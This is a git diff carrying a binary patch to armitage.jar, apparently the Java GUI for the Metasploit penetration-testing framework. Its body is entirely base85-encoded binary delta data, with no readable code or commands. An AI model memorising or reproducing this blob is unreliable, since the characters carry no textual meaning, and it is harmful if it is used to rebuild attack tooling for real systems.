diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 5ccd4ac15a74d2250efd8513a419dde87aee1312..153f8f95c0a3a630595e86b91d6525cd8b693519 100755 GIT binary patch delta 191570 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 